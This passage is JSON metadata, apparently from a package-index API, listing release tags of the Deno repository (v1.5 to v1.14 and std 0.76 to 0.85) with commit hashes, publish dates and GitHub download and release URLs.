ttps://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd